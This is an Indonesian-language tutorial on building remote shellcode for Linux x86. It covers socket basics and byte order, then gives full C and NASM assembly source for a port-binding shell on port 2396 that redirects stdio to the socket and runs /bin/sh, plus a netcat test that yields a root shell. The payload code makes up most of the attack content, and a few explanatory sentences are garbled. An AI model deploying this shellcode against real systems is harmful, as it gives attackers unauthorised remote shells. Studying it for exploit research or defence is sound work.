Dalam artikel sebelumnya saya
sudah menjelaskan dasar-dasar pembuatan shellcode. Saya sudah
menjelaskan pembuatan shellcode untuk local exploit. Nah kali ini saya
akan lanjutkan lagi untuk membuat shellcode yang dipakai untuk exploit
secara remote.
Remote Exploit
Remote exploit adalah teknik exploitasi
yang dilakukan secara remote melalui jaringan. Exploit jenis ini
biasanya menyerang server/daemon yang sedang “LISTEN” di port tertentu.
Perbedaan utama antara local exploit dan
remote exploit adalah pada kondisi awalnya. Pada local exploit, sejak
awal attacker sudah memiliki shell access baik melalui ssh, telnet atau
remote desktop connection, namun dengan hak akses terbatas (sebagai
normal user). Sedangkan pada remote exploit, kondisi awal attacker
adalah tidak memiliki akses shell. Akses shell yang saya maksud adalah
kemampun untuk execute suatu file executable.
Jadi pada local exploit, tujuannya
adalah privilege escalation atas hak akses yang terbatas tersebut
menjadi tidak terbatas (root/administrator). Sedangkan pada remote
exploit, karena pada awalnya tidak punya akses shell, maka remote
exploit berusaha mendapatkan akses shell, baik sebagai user biasa maupun
sebagai super user (root/administrator).
Remote Shellcode
Dalam artikel ini saya akan menjelaskan tentang pembuatan 2 jenis remote shellcode, yaitu:
- Port Binding Shellcode
Shellcode jenis ini bertujuan untuk
memberikan shell yang bisa diakses dari jauh melalui port tertentu.
Attacker bisa mengakses shell tersebut dengan membuka koneksi ke IP
komputer target pada port yang sudah ditentukan sebelumnya.
Port binding shellcode tidak berguna
bila komputer target dilindungi dengan firewall yang memblok inbound
koneksi ke port di luar port yang diijinkan.
Firewall yang ditakutkan bukan firewall yang berada di komputer target sebab attacker bisa juga menambahkan rutin untuk mendisable firewall di komputer target. Tetapi firewall yang berada di luar komputer target tidak bisa dimatikan dari komputer target.
- Reverse Connecting Shellcode
Reverse connecting shellcode mirip
dengan port binding shellcode namun arah koneksinya terbalik. Dalam
shellcode ini justru komputer target yang membuka koneksi ke attacker.
Kenapa diperlukan shellcode seperti ini? Dalam banyak kasus orang sangat
paranoid terhadap koneksi yang masuk ke komputernya, namun tidak
terlalu paranoid untuk koneksi keluar.

Socket ProgrammingPort yang biasanya diijinkan untuk diakses adalah port untuk http, yaitu 80 dan 443 (SSL) karena ini adalah layanan yang paling banyak dipakai sehingga kecil kemungkinan ada admin yang memblok koneksi ke web server luar
Apa itu socket? Socket merupakan salah
satu metode IPC (inter process communication), yaitu komunikasi antar
proses (running program) di komputer yang sama maupun di komputer lain
(melalui jaringan). Dalam kasus ini kita membicarakan mengenai internet
socket, yaitu socket yang digunakan untuk berkomunikasi melalui jaringan
baik dengan komputer yang sama (localhost) maupun dengan komputer lain.
Ada dua jenis internet socket, yaitu
datagram socket dan stream socket. Datagram socket digunakan untuk
berkomunikasi menggunakan protokol UDP. Protokol UDP tidak cocok dipakai
untuk kasus ini karena protokol ini tidak reliable. Stream socket
adalah socket yang memakai protokol TCP, protokol inilah yang akan
dipakai dalam shellcode ini.
Sebelum bisa memakai fungsi-fungsi socket, program harus meng-include header file berikut:
#include <sys/socket.h> // library untuk socket #include <netinet/in.h> // definisi struct untuk socket
Network Byte Order vs Host Byte Order
Dalam komputer, ada aturan bagaimana data secara internal disimpan. Ada
dua kubu aturan penyimpanan yang dipakai: little endian dan big endian.
Ada beberapa arsitektur komputer yang memakai little endian seperti
Intel, dan ada juga yang memakai big endian seperti Motorola dan
PowerPC.
Dalam socket programming kita akan berkomunikasi dengan komputer lain
yang tidak selalu sejenis arsitekturnya dengan yang kita pakai. Mungkin
di komputer kita memakai little endian, berkomunikasi dengan komputer
yang memakai big endian. Karena ada variasi ini, maka protokol IP
mendefinisikan istilah network byte order dan host byte order.
Network byte order adalah byte order dari protokol network yaitu memakai big endian byte ordering.
Host byte order adalah byte order yang dipakai client/server, bisa little atau big endian tergantung arsitektur komputernya.
Host byte order mungkin sama atau berbeda dengan host byte order.
Pada notasi little endian, byte rendah ditulis duluan, baru kemudian
byte tinggi. Sedangkan pada notasi big endian, byte tinggi ditulis
duluan, baru kemudian byte tinggi. Perhatikan gambar di bawah ini untuk
melihat perbedaan little dan big endian.

Pada gambar di atas IP address 192.168.0.14 dalam hexa adalah
C0.A8.00.0E disimpan dalam notasi little endian dan big endian. Byte
paling rendah, yaitu 0x0E disimpan di alamat memori paling rendah pada
sistem little endian. Sedangkan pada big endian, byte paling tinggi 0xC0
disimpan di alamat memori paling rendah.
Dalam kasus arsitektur Intel IA32, terdapat perbedaan endianness antara
host byte order yang memakai little endian, dengan network byte order
protokol network yang memakai big endian. Perbedaan ini membuat data
yang diterima dari protokol harus dikonversi dulu ke notasi little
endian, bila tidak akan terjadi mis-interpretasi data. Contohnya data
yang diterima dari network 0xABCD, bila tidak dikonversi maka data
tersebut dikira sebagai 0xCDAB pada komputer yang memakai little endian.
Karena protokol network memakai big endian, maka data yang ditulis dalam
paket yang dikirim ke jaringan harus dalam notasi big endian. Contohnya
dalam protokol IP, field source address harus ditulis dalam notasi big
endian. Perhatikan contoh sniffing network packet berikut:

Perhatikan pada gambar di atas, field destination IP adalah 192.168.0.14
yang bila ditulis dalam bentuk dotted hexadecimal adalah C0.A8.00.0E.
Dalam network packet, IP tersebut ditulis dalam bentuk C0.A8.00.0E,
yaitu notasi big endian untuk C0.A8.00.0E. Bila menggunakan notasi
little endian, nilai tersebut akan disimpan sebagai 0E.00.A8.C0.

Pada gambar di atas juga terlihat bahwa field destination port dan
source port juga ditulis dalam notasi big endian. Jadi jelas secara
internal kita sudah melihat raw packet data yang diambil dari network,
semua nilai ditulis dalam notasi big endian. Sekarang tinggal komputer
yang terlibat dalam komunikasi harus menyesuaikan diri dengan notasi
tersebut. Bila arsitekturnya juga memakai big endian, maka tidak ada
yang perlu dikonversi.
Karena host byte order di komputer yang saya pakai (IA32) memakai little
endian, sedangkan network byte order memakai big endian, maka
diperlukan konversi dari little endian ke big endian. Ada banyak fungsi
untuk melakukan konversi ini, antara lain:
- htons() dan htonl()
- ntohs() dan ntohl()
Mengubah host byte order ke network byte order.
Fungsi ini dipakai untuk mengirimkan paket, sebelum data ditulis dalam
paket dan dikirim ke jaringan harus dikonversi dulu dalam bentuk network
byte order.
Bagaimana menuliskan port 80 dalam network byte order? Pertama 80 dalam
hexa adalah 0×0050. Karena host (IA32) memakai little-endian, dan
network memakai big endian, maka 0×0050 ini perlu dibalik dulu menjadi
0×5000. Kenapa harus dibalik? Ingat dalam IA32, nilai 0×5000 di memori
komputer host akan tersimpan sebagai 0×00 0×50 dan dituliskan dalam
paket jaringan dalam urutan yang sama 0×00 0×50. Bila 0×0050 tidak
dibalik, maka di memori komputer host (IA32) akan tersimpan sebagai 0×50
0×00, sehingga dalam paket jaringan tertulis port 0×50 0×00 yang
berarti port 20.480 bila diartikan memakai big endian, bukan port 80.
Mengubah network byte order ke host byte order.
Fungsi ini dipakai ketika menerima paket dari jaringan. Dalam paket
tersebut data ditulis dalam notasi big endian, sehingga perlu dikonversi
ke host byte order yang sesuai (dalam kasus IA32 adalah little endian).
Dalam contoh sebelumnya, port 80 dalam paket jaringan
tertulis dalam urutan 0×00 0×50. Nilai ini ketika diterima oleh
komputer host juga tersimpan di memori dalam urutan yang sama. Urutan
dua byte 0×00 0×50 dalam host yang memakai little endian diartikan
sebagai 0×5000 yaitu 20.480. Oleh karena itu perlu dikonversi dulu
menjadi notasi little endian, menjadi 0×50 0×00. Dua byte 0×50 0×00
dalam sistem little endian diartikan sebagai nilai 0×0050 yaitu port 80.

Gambar di atas mengilustrasikan pemakaian fungsi untuk konversi
endianness antara host dan network. Dalam membua shellcode nanti kita
tidak akan memakai fungsi itu, kita akan langsung menuliskan dalam
bentuk network byte order.
Socket Address Structure
Dalam pemrograman socket, sebuah proses akan memakai IP address dan port
tertentu yang disimpan dalam struktur data bernama socket address yang
strukturnya seperti di bawah ini:
typedef uint32_t in_addr_t; struct in_addr { in_addr_t s_addr; }; struct sockaddr_in { sa_family_t sin_family; in_port_t sin_port; struct in_addr sin_addr; unsigned char sin_zero[8]; };
sin_family adalah jenis alamat yang dipakai dalam socket, dalam kasus
ini kita isi dengan 2 atau AFINET, yaitu IP (internet protocol) address.
sin_addr adalah IP address yang bertipe struct in_addr yang hanya
memiliki satu field yaitu s_addr bertipe integer. Dalam kasus port
binding shellcode, sin_addr.s_addr diisi dengan 0 atau INADDR_ANY yang
berarti kita menggunakan semua IP di localhost (tidak hanya 127.0.0.1
tapi semua IP address di komputer tersebut). sin_port adalah port yang
akan dipakai untuk LISTEN, silakan mengisi dengan port apa saja yang
tidak dipakai.
Ingat menuliskan IP address dan port harus dalam bentuk network byte orderClient Server Socket Programming

Socket programming melibatkan dua pihak, yaitu client dan server.
Hubungan antara client dan server serta fungsi yang dipakai dapat
dilihat pada gambar di atas.
Pada sisi server, fungsi yang dipakai adalah:
- socket()
- bind()
- listen()
- accept()
- read()
- write()
Ini adalah fungsi untuk membentuk socket baik di sisi
server maupun client. Pertama kali yang harus dilakukan dalam socket
programming adalah membuat socket dengan fungsi ini.
Ini adalah fungsi untuk memakai IP address dan port tertentu dalam socket yang sudah dibuat dengan fungsi socket() sebelumnya.
Ini adalah fungsi untuk LISTEN atau menunggu permintaan koneksi dari client.
Ini adalah fungsi untuk menerima koneksi dari client.
Ini adalah fungsi untuk menerima data yang dikirim client.
Ini adalah fungsi untuk mengirim data ke client.
Sedangkan pada sisi client lebih sederhana, fungsi yang dipakai adalah:
- socket()
- connect()
- read()
- write()
Sama seperti pada server, fungsi ini adalah fungsi yang pertama dipanggil dalam socket programming.
Fungsi ini untuk membuka koneksi ke server.
Fungsi ini untuk menerima data dari server.
Fungsi ini untuk mengirim data ke server.
Di UNIX semua hal adalah file, termasuk juga socket. Setiap file setelah
dibuka, dapat dioperasikan dengan memakai file handler. Ketika program
memanggil fungsi socket(), maka dia akan menerima socket file handler,
dan dengan handler tersebut operasi dengan socket bisa dilakukan untuk
berkomunikasi melalui jaringan.
Kenapa saya perlu menjelaskan tentang ini? Sebab dalam port binding
shellcode kita perlu mengarahkan file handler stdin, stdout dan stderr
ke file handler socket. STDIN adalah file handler dengan nilai 0, STDOUT
adalah file handler dengan nilai 1 dan STDERR adalah file handler
dengan nilai 2.
Biasanya stdin adalah keyboard, sehingga dengan membaca stdin program
akan menerima masukan dari user. Namun dalam shellcode ini program tidak
menerima input secara langsung dari keyboard, tetapi input berasal dari
client socket. Agar input dari client socket bisa diterima oleh shell
yang akan kita execute, maka kita perlu melakukan cloning dari client
socket ke stdin. Dengan cloning ini, kini stdin adalah client socket dan
program menerima input dari client socket.
Stdout adalah tempat untuk menampilkan output yang biasanya adalah layar
console. Namun dalam kasus ini, output harus bisa dibaca oleh attacker
yang berada di komputer lain melalui jaringan. Oleh karena itu stdout
juga harus dicloning ke client socket sehinga shell bisa mengirimkan
output melalui jaringan. Sedangkan stderr biasanya adalah layar console,
sama dengan stdout.
Cloning file handler dilakukan dengan memanggil fungsi dup2([socket
handler],[stdin/stdout/stderr]). Fungsi ini membuat socket handler dan
stdin/stdout/stderr adalah sama.
Membuat Port Binding Shellcode
Port binding shellcode artinya shellcode
bertindak sebagai server yang menunggu koneksi dari client yaitu
attacker. Sebelum kita membuat shellcode dalam bahasa assembly saya akan
membuat program port binding dalam bahasa C agar lebih mudah
dimengerti. Source code port binding shellcode dalam bahasa C terlihat
seperti di bawah ini:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 | #include <sys/socket.h> #include <netinet/in.h> int main() { char *shell[2]; int server; // server socket file handler int client; // client socket file handler struct sockaddr_in serv_addr; // definisi ipaddress dan port server=socket(2,1,0); // membuat socket STREAM serv_addr.sin_addr.s_addr=0; // ip address ALL LOCAL address serv_addr.sin_port=0x5C09; // port 2396 dalam network byte order serv_addr.sin_family=2; // Jenis address IP bind(server,(struct sockaddr*)&serv_addr,16); // bind socket ke port dan ipaddress listen(server,0); // menunggu koneksi dari client client=accept(server,0,0); // koneksi dari client sudah terjalin dup2(client,0); // duplicate stdin ke client socket dup2(client,1); // duplicate stdout ke client socket dup2(client,2); // duplicate stderr ke cilent socket shell[0] = "/bin/sh"; shell[1] = 0; execve(shell[0],shell,0); // execute shell dengan stdin,stdout dan stderr ke socket } |
Seperti pada gambar yang telah saya jelaskan di atas, socket programming
di server dimulai dari fungsi socket() untuk membuat server socket dan
mendapatkan file handlernya. Setelah itu ip address dan port harus
didefinisikan dalam struct sockaddr_in. Socket address ini akan dipakai
dalam fungsi bind() untuk mengikat port dan ip address tersebut dengan
socket yang sudah dibuat sebelumnya. Setelah ip dan port sudah terikat
dengan socket, kita bisa mulai menunggu koneksi dari client dengan
fungsi listen(). Program akan blocking di fungsi listen() ini. Program
akan resume, mulai berjalan lagi ketika client membuka koneksi dan
hubungan telah terjalin. Setelah hubungan telah terjalin, kita akan
memanggil fungsi accept() untuk mendapatkan file handler socket untuk
client.
Ada dua socket yang dipakai: server socket dan client socket
Port yang akan kita pakai untuk LISTEN adalah port 2396, yang dalam
hexadesimal adalah 0x095C. Ingat penulisan port harus dalam bentuk
network byte order (big endian), sehingga penulisannya harus dibalik
menjadi 0x5C09.
Saya menggunakan IP address bernilai 0 yang artinya all local address.
Local address disini tidak hanya 127.0.0.1 tetapi juga semua ip address
yang terdefinisi di interface yang ada pada host tersebut. Bila dalam
host tersebut ada 3 ethernet card dengan ip yang berbeda, maka dia akan
listen di semua ip tersebut.
Dalam program di atas sebelum kita mengeksekusi /bin/sh, kita perlu
mengarahkan stdin,stdout dan stderr ke client socket. Hal ini
dimaksudkan karena program yang dieksekusi dengan execve akan mewarisi
stdin, stdout dan stderr dari yang mengeksekusinya. Jadi bila tidak
dicloning dulu, maka stdin,stdout,stderr akan memakai keyboard dan layar
console sehingga tidak bisa dipakai untuk mengirim command dan menerima
outputnya dari jarak jauh.
Test
Sekarang mari kita uji program port binding di atas. Saya memakai dua
console di komputer yang sama untuk mengujinya. Pada console pertama
saya akan melakukan kompilasi dan menjalankan program tersebut sebagai
root.
$ gcc portbind.c -o portbind $ sudo ./portbind
Setelah portbind dijalankan sebagai root dengan sudo, kini di console
lain saya membuka koneksi ke port 2396 dengan mamakai program netcat.
$ nc localhost 2396 id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) whoami root exit
Oke dalam pengujian di atas kita berhasil membuat program yang listen ke
port tertentu dan mengeksekusi shell bila ada koneksi masuk. Sekarang
kita harus membuat program sejenis namun dalam bahasa assembly. Sama
seperti pembuatan local shellcode, kita menggunakan interrupt 80 hexa
untuk memanggil system call. System call yang akan kita panggil adalah
socket, bind, listen, accept, dup2 dan execve.
Keluarga system call socket, bind, listen dan accept adalah satu system
call dengan nomor 102. Sebelum memanggil interrupt 80h kita perlu
mendefinisikan dulu apa yang akan kita panggil, apakah socket, bind,
listen atau accept. Pilihan tersebut harus dimasukkan dalam register
EBX:
- EBX = 1 untuk socket()
- EBX = 2 untuk bind()
- EBX = 3 untuk connect()
- EBX = 4 untuk listen()
- EBX = 5 untuk accept()
Parameter untuk fungsi socket, bind, connect, listen dan accept disimpan
sebagai array yang addressnya disimpan dalam register ECX. Seperti
biasa register EAX harus diisi dengan nomor system call yaitu 102.
struct sockaddr_in dalam Assembly
Bagian yang rumit dalam shellcode ini adalah ketika membentuk struct
sockaddr_in. Struct ini sebenarnya berukuran 16 byte, tetapi 8 byte
terakhir adalah sin_zero yang tidak terpakai, jadi kita hanya fokus
mengisi 8 byte pertama.
Susunan byte pada struct sockaddr_in adalah:
- Byte ke-1 dan ke-2: sin_family yang akan diisi dengan 0×0002 (AF_INET).
- Byte ke-3 dan ke-4: sin_port yang akan diisi dengan 0x5C09 (port 2396).
- Byte ke-5 s/d ke-8: sin_addr.s_addr yang akan diisi dengan 0×00000000 (semua IP di interface host).
Alamat dari struct sockaddr_in ini harus disimpan dalam ECX. Kita akan
memanfaatkan stack untuk membentuk struct ini. Karena stack adalah
struktur data LIFO, maka kita harus push dulu 4 byte terakhir
(0×00000000), kemudian diikuti dengan push 2 byte untuk sin_port dan
terakhir baru push untuk sin_family. Setelah semua di-push, maka ESP
menunjuk pada address struct ini sehingga harus kita salin ke ECX.
Snipped assembly di bawah ini adalah instruksi untuk membuat struct
sockaddr_in. Di akhir source, ESP menunjuk pada address struct
sockaddr_in.
1 2 3 4 5 | xor edx,edx ; edx = 0 push edx ; push sin_addr.s_addr 0x0 push word 0x5C09 ; push sin_port add edx,2 push dx ; push sin_family 0x0002 |
Setelah snippet di atas dijalankan, struct sockaddr_in akan terlihat seperti di bawah ini:
0x02 0x00 0x09 0x5C 0x00 0x00 0x00 0x00
0×02 0×00 adalah sin_family, hasil dari instruksi “push dx” pada saat
regsiter DX bernilai 2. Byte berikutnya 0×09 0x5C adalah sin_port, hasil
dari instruksi “push word 0x5C09″. Lalu 4 byte sisanya adalah
sin_addr.s_addr hasil dari instruksi “push edx” pada saat EDX bernilai
0.
Source Code Assembly Port Binding Shellcode1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 | BITS 32 section .text global _start _start: xor eax,eax xor ebx,ebx xor edx,edx ;server=socket(2,1,0) push eax ; push 0 push byte 0x1 ; push 1 push byte 0x2 ; push 2 mov ecx,esp ; ECX points to [2][1][0] inc bl ; EBX=1 means socket() mov al,102 int 0x80 ; esi = server socket handler mov esi,eax ;bind(server,(struct sockaddr*)&serv_addr,16) push edx push word 0x5C09 add edx,2 push dx mov ecx,esp ; ECX = &serv_addr push byte 16 ; push 16 (sizeof struct sockaddr) push ecx ; push &serv_addr push esi ; push server socket handler mov ecx,esp ; ECX points to [server][&serv_addr][16] inc bl ; EBX=2 means bind() mov al,102 int 0x80 ;listen(server,0) xor edx,edx push edx ; push 0 push esi ; push server socket handler mov ecx,esp ; ECX points to [server][0] mov bl,0x4 ; EBX=4 means listen() mov al,102 int 0x80 ;client=accept(server,0,0) push edx ; push 0 push edx ; push 0 push esi ; push server socket handler mov ecx,esp ; ECX points to [server][0][0] inc bl ; EBX=5 means accept() mov al,102 int 0x80 ; ebx = client socket handler mov ebx,eax ;dup2(client,0) xor ecx,ecx mov al,63 int 0x80 ;dup2(client,1) inc ecx mov al,63 int 0x80 ;dup2(client,2) inc ecx mov al,63 int 0x80 ;execve "/bin//sh" push edx ; push NULL (0x0) push long 0x68732f2f ; push //sh push long 0x6e69622f ; push /bin mov ebx,esp ; EBX = address of "/bin//sh" push edx ; push NULL (0x0) push ebx ; push address of "/bin//sh" mov ecx,esp ; ECX address of [address of "/bin//sh",NULL] mov al,0x0b ; exec system call int 0x80 |












